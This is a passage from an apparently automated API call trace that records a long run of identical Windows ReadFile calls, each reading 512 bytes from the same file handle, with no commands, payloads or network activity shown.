lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, 
lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile 
(in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 
[0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, 
lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, 
lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: 
lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, 
lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, 
